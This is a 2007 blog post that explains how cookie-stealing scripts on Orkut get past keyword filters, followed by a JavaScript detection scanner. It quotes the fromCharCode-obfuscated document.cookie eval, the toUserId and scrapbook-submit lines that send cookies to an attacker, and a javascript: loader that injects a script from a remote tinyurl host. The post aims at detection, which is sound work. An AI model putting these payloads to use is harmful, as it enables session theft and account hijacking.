Friday, July 20, 2007

New cookie stealing scripts

It seems that Orkut has banned the use of the term document.cookie in scripts running on Orkut. Hence the previously described tag "document.cookie" will not be found in the cookie stealing scripts that run while you browse Orkut.

The hackers have bypassed this hindrance by using this function instead:

varname.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101))

or its various versions like:

varname.scrapText.value=eval(String.fromCharCode(100111,99117109101110116,46,99111111107105101))

  • Any variable name may appear in place of varname.
  • scrapText is Orkut's name for the Scrapbook's text area.
  • That numeric string is the ASCII codes of the characters, which the function decodes to "d o c u m e n t . c o o k i e".
  • Thus, assigning the value of the above function is equivalent to including the word "document.cookie", which is the keyword for accessing the cookies of your browser.

As the cookie needs to be sent to the hacker's account, the cookie stealing script will contain a statement like:

"varname".toUserId.value=36477993

The above number is just a random example. Any variable name may appear in place of varname; that statement sets the GID of the Google profile to which the cookie will be sent. Note that this is not the UID that appears in the profile URL.


As the script writes a scrap into the hacker's scrapbook, it contains code like the following:

varname.action='Scrapbook.aspx?Action.writeScrapBasic'
varname.action='Scrapbook.aspx?Action.submit'
varname=replyForm
etc.


Seeing this menace, all Orkut has done to date is change the word "writeScrapBasic" to "submit", which the script writers identified within minutes; they modified their scripts and continued hacking.

A script that uses "writeScrapBasic" will not work any more; the scripts using "submit" will steal cookies.



Another type of malicious script is more general:

javascript:d=document.createElement('SCRIPT');d.src='http://tinyurl.com/3d6k7b';document.getElementsByTagName('head').item(0).appendChild(d);void(0)

That 3d6k7b is a random code.


This script loads its source code from http://tinyurl.com/3d6k7b, which invariably redirects to some other location hosting the actual script that contains the cookie stealing code. Thus, this type of coding bypasses all the kinds of checks we had known till now.


So, you can look for these tell-tale signs of a cookie stealing script on Orkut. That numeric string is the best and clearest identification.
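An added example (not part of the original post) that turns these tell-tale signs into a check: a small JavaScript scanner that decodes String.fromCharCode(...) calls the same way the browser would and then looks for the indicators discussed above in both the raw and the decoded text. Function names, indicator names and the sample inputs are my own and are constructed for illustration.

```javascript
// Added example: a scanner for the tell-tale signs described in the post.
// Function and indicator names are my own; sample inputs are constructed.

// Replace every String.fromCharCode(n, n, ...) that has literal numeric
// arguments with the decoded string (quoted), computed as the browser would.
function decodeCharCodeCalls(script) {
  return script.replace(/String\.fromCharCode\(\s*([\d\s,]+)\)/g, (_, list) => {
    const codes = list.split(',').map(s => s.trim()).filter(Boolean).map(Number);
    return JSON.stringify(String.fromCharCode(...codes));
  });
}

// Each indicator is run on the raw text and on the decoded text, so the
// fromCharCode trick cannot hide the document.cookie keyword.
const INDICATORS = [
  { name: 'document.cookie',         test: s => /document\.cookie/.test(s) },
  { name: 'charcode-obfuscation',    test: s => /String\.fromCharCode\(/.test(s) },
  { name: 'scrapbook-submit-action', test: s => /Scrapbook\.aspx\?Action\.(submit|writeScrapBasic)/.test(s) },
  { name: 'hardcoded-toUserId',      test: s => /\.toUserId\.value\s*=\s*\d+/.test(s) },
  { name: 'remote-script-injection', test: s => /createElement\(\s*['"]script['"]\s*\)/i.test(s) && /\.src\s*=/.test(s) },
];

// Returns the decoded text and the names of all indicators that matched.
function scanScript(script) {
  const decoded = decodeCharCodeCalls(script);
  const indicators = INDICATORS
    .filter(i => i.test(script) || i.test(decoded))
    .map(i => i.name);
  return { decoded, indicators };
}

// Constructed samples modelled on the snippets quoted in the post
// (placeholder variable name, GID and URL).
const SAMPLES = {
  obfuscatedCookie: "f.scrapText.value=eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,99,111,111,107,105,101))",
  runTogetherCodes: "f.scrapText.value=eval(String.fromCharCode(100111,99117109101110116,46,99111111107105101))",
  hardcodedTarget:  "f.toUserId.value=12345678;f.action='Scrapbook.aspx?Action.submit'",
  remoteLoader:     "d=document.createElement('SCRIPT');d.src='http://example.invalid/x.js';document.getElementsByTagName('head').item(0).appendChild(d)",
  benign:           "document.getElementById('status').textContent='scrap sent'",
};

for (const [label, text] of Object.entries(SAMPLES)) {
  console.log(label, scanScript(text).indicators);
}
```

The run-together variant decodes to a few unreadable characters rather than the keyword, which is why the scanner also flags any fromCharCode call on its own instead of relying only on the decoded text.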

1 comment:

Anonymous said...

wow...
